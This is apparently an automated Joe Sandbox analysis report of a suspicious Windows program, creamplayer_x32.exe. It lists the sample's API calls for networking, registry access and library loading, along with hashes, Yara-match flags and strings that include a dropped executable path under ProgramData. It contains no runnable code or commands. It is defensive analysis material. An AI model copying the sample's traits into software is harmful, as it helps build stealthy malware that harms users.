                                                                                                    • FindResourceA.KERNEL32(?,0000000A), ref: 00401351
                                                                                                    • SizeofResource.KERNEL32(00000000), ref: 00401370
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2614349634.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2614349634.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_400000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Resource$FindSizeof
                                                                                                    • String ID:
                                                                                                    • API String ID: 3019604839-3916222277
                                                                                                    • Opcode ID: d05602b0e20a881077e161112d5bd34232c8f71c7560e683aad862cf59917e15
                                                                                                    • Instruction ID: 99c0fe4c6fcc412865ae331c3b3e6021d15f3ce72c6bf11de14b0ecb449eac57
                                                                                                    • Opcode Fuzzy Hash: d05602b0e20a881077e161112d5bd34232c8f71c7560e683aad862cf59917e15
                                                                                                    • Instruction Fuzzy Hash: 7D810275D04259DFDF01CFE8D985AEEBBB0BF09305F1400A6E541B72A2C3385A85DB69

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • RtlEnterCriticalSection.NTDLL(?), ref: 02D42706
                                                                                                    • CreateWaitableTimerA.KERNEL32(00000000,00000000,00000000), ref: 02D4272B
                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02D63163), ref: 02D42738
                                                                                                      • Part of subcall function 02D41712: __EH_prolog.LIBCMT ref: 02D41717
                                                                                                    • SetWaitableTimer.KERNEL32(?,?,000493E0,00000000,00000000,00000000), ref: 02D42778
                                                                                                    • RtlLeaveCriticalSection.NTDLL(?), ref: 02D427D9
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2616558941.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_2d41000_creamplayer_x32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CriticalSectionTimerWaitable$CreateEnterErrorH_prologLastLeave
                                                                                                    • String ID: timer
                                                                                                    • API String ID: 4293676635-1792073242
                                                                                                    • Opcode ID: e38710ae991459d4c4b2710b3ef884eee42d1200cc16d921774f6c21b8b37c2b
                                                                                                    • Instruction ID: 4d15b9d9073b61f6567a1f56052797aa3b892fa2fe102b1045681dcfb44fe0c3
                                                                                                    • Opcode Fuzzy Hash: e38710ae991459d4c4b2710b3ef884eee42d1200cc16d921774f6c21b8b37c2b
                                                                                                    • Instruction Fuzzy Hash: F5317AB1904705AFD310DF65D888B26BBA8FB48765F004A2AF85582B80EB70ED54CFA1

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 1118 2d41ba7-2d41bcf call 2d62a00 RtlEnterCriticalSection 1121 2d41bd1 1118->1121 1122 2d41be9-2d41bf7 RtlLeaveCriticalSection call 2d4d325 1118->1122 1123 2d41bd4-2d41be0 call 2d41b79 1121->1123 1124 2d41bfa-2d41c20 RtlEnterCriticalSection 1122->1124 1128 2d41c55-2d41c6e RtlLeaveCriticalSection 1123->1128 1129 2d41be2-2d41be7 1123->1129 1127 2d41c34-2d41c36 1124->1127 1130 2d41c22-2d41c2f call 2d41b79 1127->1130 1131 2d41c38-2d41c43 1127->1131 1129->1122 1129->1123 1133 2d41c45-2d41c4b 1130->1133 1136 2d41c31 1130->1136 1131->1133 1133->1128 1135 2d41c4d-2d41c51 1133->1135 1135->1128 1136->1127
                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 02D41BAC
                                                                                                    • RtlEnterCriticalSection.NTDLL ref: 02D41BBC
                                                                                                    • RtlLeaveCriticalSection.NTDLL ref: 02D41BEA
                                                                                                    • RtlEnterCriticalSection.NTDLL ref: 02D41C13
                                                                                                    • RtlLeaveCriticalSection.NTDLL ref: 02D41C56
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2616558941.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_2d41000_creamplayer_x32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CriticalSection$EnterLeave$H_prolog
                                                                                                    • String ID:
                                                                                                    • API String ID: 1633115879-0
                                                                                                    • Opcode ID: 4fa358b6a379bf75fc9bb77f415bcf6a0b86c715e3b08bc91c7cb3893bd823b7
                                                                                                    • Instruction ID: 8b2ef89c08482791613291b5071c3c7e2ec6046271d9cd5c991110b62498899d
                                                                                                    • Opcode Fuzzy Hash: 4fa358b6a379bf75fc9bb77f415bcf6a0b86c715e3b08bc91c7cb3893bd823b7
                                                                                                    • Instruction Fuzzy Hash: 8521AB75A00214DFDB14CF68D8487AABBB5FF49714F208549E81997300DB71EE85CBE0

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • GetVersion.KERNEL32 ref: 00402996
                                                                                                      • Part of subcall function 00403AB4: HeapCreate.KERNEL32(00000000,00001000,00000000,004029CF,00000000), ref: 00403AC5
                                                                                                      • Part of subcall function 00403AB4: HeapDestroy.KERNEL32 ref: 00403B04
                                                                                                    • GetCommandLineA.KERNEL32 ref: 004029E4
                                                                                                    • GetStartupInfoA.KERNEL32(?), ref: 00402A0F
                                                                                                    • GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 00402A32
                                                                                                      • Part of subcall function 00402A8B: ExitProcess.KERNEL32 ref: 00402AA8
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2614349634.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2614349634.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_400000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Heap$CommandCreateDestroyExitHandleInfoLineModuleProcessStartupVersion
                                                                                                    • String ID:
                                                                                                    • API String ID: 2057626494-0
                                                                                                    • Opcode ID: 12420a6f8d859e7cb1559808f7d7871c5152186d5c4e15c43186c2bde801d951
                                                                                                    • Instruction ID: a5d49b7249978d3965762e6696208bd63d45c978be5a3a1e89be3984253889d2
                                                                                                    • Opcode Fuzzy Hash: 12420a6f8d859e7cb1559808f7d7871c5152186d5c4e15c43186c2bde801d951
                                                                                                    • Instruction Fuzzy Hash: 89218EB1900605AADB14AFB6DE49A6E7FA8EB04705F10413FF905BB2D1DF384500CA6C

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 1166 2d42edd-2d42f1f WSASetLastError WSASocketA call 2d4fb10 WSAGetLastError 1169 2d42f21-2d42f25 1166->1169 1170 2d42f49-2d42f4f 1166->1170 1171 2d42f27-2d42f36 setsockopt 1169->1171 1172 2d42f3c-2d42f47 call 2d4fb10 1169->1172 1171->1172 1172->1170
                                                                                                    APIs
                                                                                                    • WSASetLastError.WS2_32(00000000), ref: 02D42EEE
                                                                                                    • WSASocketA.WS2_32(?,?,?,00000000,00000000,00000001), ref: 02D42EFD
                                                                                                    • WSAGetLastError.WS2_32(?,?,?,00000000,00000000,00000001), ref: 02D42F0C
                                                                                                    • setsockopt.WS2_32(00000000,00000029,0000001B,00000000,00000004), ref: 02D42F36
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2616558941.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_2d41000_creamplayer_x32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast$Socketsetsockopt
                                                                                                    • String ID:
                                                                                                    • API String ID: 2093263913-0
                                                                                                    • Opcode ID: 5e0b715fafa348a95e8c14b9c907b0c87c2d8608882e8d0c655ebe5ed91b7ace
                                                                                                    • Instruction ID: df596870a567c87d16d9e6666a5ca59fd9a8d914a8093190a6e61249e2f0b002
                                                                                                    • Opcode Fuzzy Hash: 5e0b715fafa348a95e8c14b9c907b0c87c2d8608882e8d0c655ebe5ed91b7ace
                                                                                                    • Instruction Fuzzy Hash: C5017575A00214BBDB209F66DC4CB5A7BA9DB86761F408965F9189B291DB748D00CBB0

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 1175 2d42db5-2d42dc8 1176 2d42de4-2d42de8 1175->1176 1177 2d42dca-2d42dd2 call 2d4fb10 1175->1177 1179 2d42dfc-2d42e07 call 2d42d39 1176->1179 1180 2d42dea-2d42ded 1176->1180 1184 2d42dd8 1177->1184 1186 2d42e0c-2d42e11 1179->1186 1180->1179 1182 2d42def-2d42dfa call 2d4fb10 1180->1182 1182->1184 1187 2d42ddb 1184->1187 1189 2d42e13 1186->1189 1190 2d42ddd-2d42de3 1186->1190 1187->1190 1191 2d42e16-2d42e18 1189->1191 1191->1187 1192 2d42e1a-2d42e35 call 2d4fb10 call 2d4166f 1191->1192 1197 2d42e54-2d42e97 WSASetLastError select call 2d494fe 1192->1197 1198 2d42e37-2d42e52 call 2d4fb10 call 2d4166f 1192->1198 1204 2d42ea6 1197->1204 1205 2d42e99-2d42ea4 call 2d4fb10 1197->1205 1198->1187 1198->1197 1206 2d42eb6-2d42eb8 1204->1206 1207 2d42ea8-2d42eb3 call 2d4fb10 1204->1207 1211 2d42ebe-2d42ed2 call 2d42d39 1205->1211 1206->1187 1206->1211 1207->1206 1211->1191 1216 2d42ed8 1211->1216 1216->1190
                                                                                                    APIs
                                                                                                      • Part of subcall function 02D42D39: WSASetLastError.WS2_32(00000000), ref: 02D42D47
                                                                                                      • Part of subcall function 02D42D39: WSASend.WS2_32(?,?,?,?,00000000,00000000,00000000), ref: 02D42D5C
                                                                                                    • WSASetLastError.WS2_32(00000000), ref: 02D42E6D
                                                                                                    • select.WS2_32(?,00000000,00000001,00000000,00000000), ref: 02D42E83
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2616558941.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_2d41000_creamplayer_x32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast$Sendselect
                                                                                                    • String ID: 3'
                                                                                                    • API String ID: 2958345159-280543908
                                                                                                    • Opcode ID: 0ff5dc942d60aaadda770ad0fb9d8031c6f8f5d713df86d6c15a2fe8f6e823ca
                                                                                                    • Instruction ID: 598f815181d144a13613b4ba7a2184b7ff12e03a48db366d95513747752a04aa
                                                                                                    • Opcode Fuzzy Hash: 0ff5dc942d60aaadda770ad0fb9d8031c6f8f5d713df86d6c15a2fe8f6e823ca
                                                                                                    • Instruction Fuzzy Hash: 44317CB1A102159FDB10DFA4D8587EEBBAAEF05394F00456AEC0597740EF759D90CBE0
                                                                                                    APIs
                                                                                                    • WSASetLastError.WS2_32(00000000), ref: 02D42AEA
                                                                                                    • connect.WS2_32(?,?,?), ref: 02D42AF5
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2616558941.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_2d41000_creamplayer_x32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLastconnect
                                                                                                    • String ID: 3'
                                                                                                    • API String ID: 374722065-280543908
                                                                                                    • Opcode ID: 1f2bdd04d95f0b90c0976e6107fc31642abada8876349d992fd0f1f5810032e5
                                                                                                    • Instruction ID: fcddac10be79ab1f770deff703ccdc138ad665e92f083a3cc89916851bbebfce
                                                                                                    • Opcode Fuzzy Hash: 1f2bdd04d95f0b90c0976e6107fc31642abada8876349d992fd0f1f5810032e5
                                                                                                    • Instruction Fuzzy Hash: 85219570E00214ABCF10AFA4D5186AEBBBAEF45364F504599EC5893384DF749E018BA1
                                                                                                    APIs
                                                                                                    • RegOpenKeyExA.KERNEL32(80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,?,00000001), ref: 0040D50F
                                                                                                    Strings
                                                                                                    • C:\ProgramData\SmartImageDrive\SmartImageDrive.exe, xrefs: 00401940, 0040201E
                                                                                                    • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 0040D5E3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2614349634.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2614349634.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_400000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Open
                                                                                                    • String ID: C:\ProgramData\SmartImageDrive\SmartImageDrive.exe$Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                    • API String ID: 71445658-2779163671
                                                                                                    • Opcode ID: b3939a01fa3a1185ddba5122bc593cde9dc8bd1e1c2eabb61b87dab3e4c18119
                                                                                                    • Instruction ID: 2533d3d238de4453824918644633466c6923f18ecc45869b85252f61657cec01
                                                                                                    • Opcode Fuzzy Hash: b3939a01fa3a1185ddba5122bc593cde9dc8bd1e1c2eabb61b87dab3e4c18119
                                                                                                    • Instruction Fuzzy Hash: 9BF0A0A0549212FAD31216614E9DEB726AC9B16358B2000BBBA43F60E1C5BC094BE13F
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2616558941.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_2d41000_creamplayer_x32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog
                                                                                                    • String ID:
                                                                                                    • API String ID: 3519838083-0
                                                                                                    • Opcode ID: 257cf569f835299bb370de6763997442ef6cfaa37c0c109c1212d82d27d3228e
                                                                                                    • Instruction ID: 7a1deb832a51dfd0fe5b8573f103a832b3fc4e9e8fd847d15f26e17abf29bd51
                                                                                                    • Opcode Fuzzy Hash: 257cf569f835299bb370de6763997442ef6cfaa37c0c109c1212d82d27d3228e
                                                                                                    • Instruction Fuzzy Hash: 53513C71905256DFCB48DF68D5546AABBB1FF08320F20819EE8699B390DB75DD10CFA0
                                                                                                    APIs
                                                                                                    • InterlockedIncrement.KERNEL32(?), ref: 02D436A7
                                                                                                      • Part of subcall function 02D42420: InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 02D42432
                                                                                                      • Part of subcall function 02D42420: PostQueuedCompletionStatus.KERNEL32(?,00000000,00000002,?), ref: 02D42445
                                                                                                      • Part of subcall function 02D42420: RtlEnterCriticalSection.NTDLL(?), ref: 02D42454
                                                                                                      • Part of subcall function 02D42420: InterlockedExchange.KERNEL32(?,00000001), ref: 02D42469
                                                                                                      • Part of subcall function 02D42420: RtlLeaveCriticalSection.NTDLL(?), ref: 02D42470
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2616558941.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_2d41000_creamplayer_x32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Interlocked$CriticalExchangeSection$CompareCompletionEnterIncrementLeavePostQueuedStatus
                                                                                                    • String ID:
                                                                                                    • API String ID: 1601054111-0
                                                                                                    • Opcode ID: a6c0cdc9d7fe45b02db159afe9ad5435df034e7dab67e61b1ca5cf769a767afc
                                                                                                    • Instruction ID: 75539e92f42f2e8c60ef1cbdb8b62d1e20c8a1169f21e739f01541fdd3f7beda
                                                                                                    • Opcode Fuzzy Hash: a6c0cdc9d7fe45b02db159afe9ad5435df034e7dab67e61b1ca5cf769a767afc
                                                                                                    • Instruction Fuzzy Hash: B411E3B5500209ABDF219F18DC89FAA3BA9EF44354F204556FE96CA390CF74DC60CBA4
APIs
• __beginthreadex.LIBCMT ref: 02D51106
• CloseHandle.KERNEL32(?,?,?,?,?,00000002,02D4997E,00000000), ref: 02D51137
• ResumeThread.KERNEL32(?,?,?,?,?,00000002,02D4997E,00000000), ref: 02D51145
Memory Dump Source
• Source File: 00000005.00000002.2616558941.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_2d41000_creamplayer_x32.jbxd
Yara matches
Similarity
• API ID: CloseHandleResumeThread__beginthreadex
• String ID:
• API String ID: 1685284544-0
APIs
Strings
• C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe, xrefs: 004018C1
Memory Dump Source
• Source File: 00000005.00000002.2614349634.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.2614349634.000000000040B000.00000040.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_creamplayer_x32.jbxd
Similarity
• API ID: lstrcmpi
• String ID: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe
• API String ID: 1586166983-1745385716
APIs
• InterlockedIncrement.KERNEL32(02D7529C), ref: 02D41ABA
• WSAStartup.WS2_32(00000002,00000000), ref: 02D41ACB
• InterlockedExchange.KERNEL32(02D752A0,00000000), ref: 02D41AD7
Memory Dump Source
• Source File: 00000005.00000002.2616558941.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_2d41000_creamplayer_x32.jbxd
Yara matches
Similarity
• API ID: Interlocked$ExchangeIncrementStartup
• String ID:
• API String ID: 1856147945-0
APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.2616558941.0000000002D78000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D78000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_2d78000_creamplayer_x32.jbxd
Similarity
• API ID: InternetOpen
• String ID: "~*
• API String ID: 2038078732-1235269204
APIs
• RegOpenKeyExA.KERNEL32(80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,?,00000001), ref: 0040D50F
Strings
• Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 0040D5E3
Memory Dump Source
• Source File: 00000005.00000002.2614349634.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.2614349634.000000000040B000.00000040.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_creamplayer_x32.jbxd
Similarity
• API ID: Open
• String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
• API String ID: 71445658-2036018995
APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.2614349634.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.2614349634.000000000040B000.00000040.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_creamplayer_x32.jbxd
Similarity
• API ID: Close
• String ID: SmartImageDrive
• API String ID: 3535843008-2364236983
APIs
• __EH_prolog.LIBCMT ref: 02D44BF2
  • Part of subcall function 02D41BA7: __EH_prolog.LIBCMT ref: 02D41BAC
  • Part of subcall function 02D41BA7: RtlEnterCriticalSection.NTDLL ref: 02D41BBC
  • Part of subcall function 02D41BA7: RtlLeaveCriticalSection.NTDLL ref: 02D41BEA
  • Part of subcall function 02D41BA7: RtlEnterCriticalSection.NTDLL ref: 02D41C13
  • Part of subcall function 02D41BA7: RtlLeaveCriticalSection.NTDLL ref: 02D41C56
  • Part of subcall function 02D4D0ED: __EH_prolog.LIBCMT ref: 02D4D0F2
  • Part of subcall function 02D4D0ED: InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02D4D171
• InterlockedExchange.KERNEL32(?,00000000), ref: 02D44CF2
Memory Dump Source
• Source File: 00000005.00000002.2616558941.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_2d41000_creamplayer_x32.jbxd
Yara matches
Similarity
• API ID: CriticalSection$H_prolog$EnterExchangeInterlockedLeave
• String ID:
• API String ID: 1927618982-0
APIs
• WSASetLastError.WS2_32(00000000), ref: 02D42D47
• WSASend.WS2_32(?,?,?,?,00000000,00000000,00000000), ref: 02D42D5C
  • Part of subcall function 02D494FE: WSAGetLastError.WS2_32(00000000,?,?,02D42A51), ref: 02D4950C
Memory Dump Source
• Source File: 00000005.00000002.2616558941.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_2d41000_creamplayer_x32.jbxd
Yara matches
Similarity
• API ID: ErrorLast$Send
• String ID:
• API String ID: 1282938840-0
APIs
• WSASetLastError.WS2_32(00000000), ref: 02D473FC
• shutdown.WS2_32(?,00000002), ref: 02D47405
Memory Dump Source
• Source File: 00000005.00000002.2616558941.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_2d41000_creamplayer_x32.jbxd
Yara matches
Similarity
• API ID: ErrorLastshutdown
• String ID:
• API String ID: 1920494066-0
APIs
• HeapCreate.KERNEL32(00000000,00001000,00000000,004029CF,00000000), ref: 00403AC5
  • Part of subcall function 0040396C: GetVersionExA.KERNEL32 ref: 0040398B
• HeapDestroy.KERNEL32 ref: 00403B04
  • Part of subcall function 00403E8B: HeapAlloc.KERNEL32(00000000,00000140,00403AED,000003F8), ref: 00403E98
Memory Dump Source
• Source File: 00000005.00000002.2614349634.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.2614349634.000000000040B000.00000040.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_creamplayer_x32.jbxd
Similarity
• API ID: Heap$AllocCreateDestroyVersion
• String ID:
• API String ID: 2507506473-0
APIs
Memory Dump Source
• Source File: 00000005.00000002.2614349634.000000000040B000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.2614349634.0000000000400000.00000040.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_creamplayer_x32.jbxd
Similarity
• API ID: CloseValue
• String ID:
• API String ID: 3132538880-0
APIs
• __EH_prolog.LIBCMT ref: 02D4511E
  • Part of subcall function 02D43D7E: htons.WS2_32(?), ref: 02D43DA2
  • Part of subcall function 02D43D7E: htonl.WS2_32(00000000), ref: 02D43DB9
  • Part of subcall function 02D43D7E: htonl.WS2_32(00000000), ref: 02D43DC0
Memory Dump Source
• Source File: 00000005.00000002.2616558941.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_2d41000_creamplayer_x32.jbxd
Yara matches
Similarity
• API ID: htonl$H_prologhtons
• String ID:
• API String ID: 4039807196-0
APIs
Memory Dump Source
• Source File: 00000005.00000002.2616558941.0000000002D78000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D78000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_2d78000_creamplayer_x32.jbxd
Similarity
• API ID: FileWrite
• String ID:
• API String ID: 3934441357-0
                                                                                                    • Opcode ID: 31f8590b0dd1c24646cbf07f3c632ebabbc2d903f78ee710938f84ab34b4d9d3
                                                                                                    • Instruction ID: 3e8ef4ca87abc9438b372a251d094d8446b4983c529c965e1166a781f07d674b
                                                                                                    • Opcode Fuzzy Hash: 31f8590b0dd1c24646cbf07f3c632ebabbc2d903f78ee710938f84ab34b4d9d3
                                                                                                    • Instruction Fuzzy Hash: 9C418EB250C704AFE301BF19ECC56BAFBE5EF98660F16892DE6C447700D63658008A97
APIs
• __EH_prolog.LIBCMT ref: 02D4D9BB
  • Part of subcall function 02D41A01: TlsGetValue.KERNEL32 ref: 02D41A0A
Memory Dump Source
• Source File: 00000005.00000002.2616558941.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_2d41000_creamplayer_x32.jbxd
Yara matches
Similarity
• API ID: H_prologValue
• String ID:
• API String ID: 3700342317-0
• Opcode ID: d5760a7911b955dc0073983af0ca22b902a0a2c0dab47d612b5f839035c1e275
• Instruction ID: 8db6f25d52eee0b2effa0a61d94e5e647ac220bcdc0a2ad70716a103938472a7
• Opcode Fuzzy Hash: d5760a7911b955dc0073983af0ca22b902a0a2c0dab47d612b5f839035c1e275
• Instruction Fuzzy Hash: 83212FB2908209AFDB04DFA9D445AFEBBFAEF59314F10415EE904A7340DB71AD01CBA1
APIs
• SHGetSpecialFolderPathA.SHELL32 ref: 02DDEA14
Memory Dump Source
• Source File: 00000005.00000002.2616558941.0000000002D78000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D78000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_2d78000_creamplayer_x32.jbxd
Similarity
• API ID: FolderPathSpecial
• String ID:
• API String ID: 994120019-0
• Opcode ID: ab41f332bdb72f8f8eb5bd0f12e9302dd1c082b0985fee7642b4d0df229e0997
• Instruction ID: 60ec4c5b959329fa2f5778b67708a88b79c8cc47627d89d47cd169b8aa0a72d2
• Opcode Fuzzy Hash: ab41f332bdb72f8f8eb5bd0f12e9302dd1c082b0985fee7642b4d0df229e0997
• Instruction Fuzzy Hash: E70128F390C301AFE7099E18ECC2768F794EF54220F09093DD7C04B394D63568518693
APIs
• __EH_prolog.LIBCMT ref: 02D4D54B
  • Part of subcall function 02D426DB: RtlEnterCriticalSection.NTDLL(?), ref: 02D42706
  • Part of subcall function 02D426DB: CreateWaitableTimerA.KERNEL32(00000000,00000000,00000000), ref: 02D4272B
  • Part of subcall function 02D426DB: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02D63163), ref: 02D42738
  • Part of subcall function 02D426DB: SetWaitableTimer.KERNEL32(?,?,000493E0,00000000,00000000,00000000), ref: 02D42778
  • Part of subcall function 02D426DB: RtlLeaveCriticalSection.NTDLL(?), ref: 02D427D9
Memory Dump Source
• Source File: 00000005.00000002.2616558941.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_2d41000_creamplayer_x32.jbxd
Yara matches
Similarity
• API ID: CriticalSectionTimerWaitable$CreateEnterErrorH_prologLastLeave
• String ID:
• API String ID: 4293676635-0
• Opcode ID: e2cbbe67b0ceb0738a77dfc74e26956b6c89bf1cabde390869e14944b3f63568
• Instruction ID: 4f7ccc2c8e0fcf97103be1beda233b044887446c676cf146dc3ea60a9ecff4df
• Opcode Fuzzy Hash: e2cbbe67b0ceb0738a77dfc74e26956b6c89bf1cabde390869e14944b3f63568
• Instruction Fuzzy Hash: 9F01CEB0900B088FC328CF0AC548996FBE5EF88304B15C5AFD4499B722E771AA40CF94
APIs
• LoadLibraryExA.KERNEL32(?), ref: 0040D06C
Memory Dump Source
• Source File: 00000005.00000002.2614349634.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.2614349634.000000000040B000.00000040.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_creamplayer_x32.jbxd
Similarity
• API ID: LibraryLoad
• String ID:
• API String ID: 1029625771-0
• Opcode ID: b6ffc2b7e77549ca374be7c8e75bdd03675a77abcb92516b724ecc3982b4a31d
• Instruction ID: 1456751b5a99db78de43e346b0be6a0e5ccfdf10eee6c1b580c6771a8926aa97
• Opcode Fuzzy Hash: b6ffc2b7e77549ca374be7c8e75bdd03675a77abcb92516b724ecc3982b4a31d
• Instruction Fuzzy Hash: 2DF03A31E14119DFCB04DFA8D8A4AECB7B1FF08710F91802AE416BB290D774A84ACB15
APIs
• __EH_prolog.LIBCMT ref: 02D4D32A
  • Part of subcall function 02D527B5: _malloc.LIBCMT ref: 02D527CD
  • Part of subcall function 02D4D546: __EH_prolog.LIBCMT ref: 02D4D54B
Memory Dump Source
• Source File: 00000005.00000002.2616558941.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_2d41000_creamplayer_x32.jbxd
Yara matches
Similarity
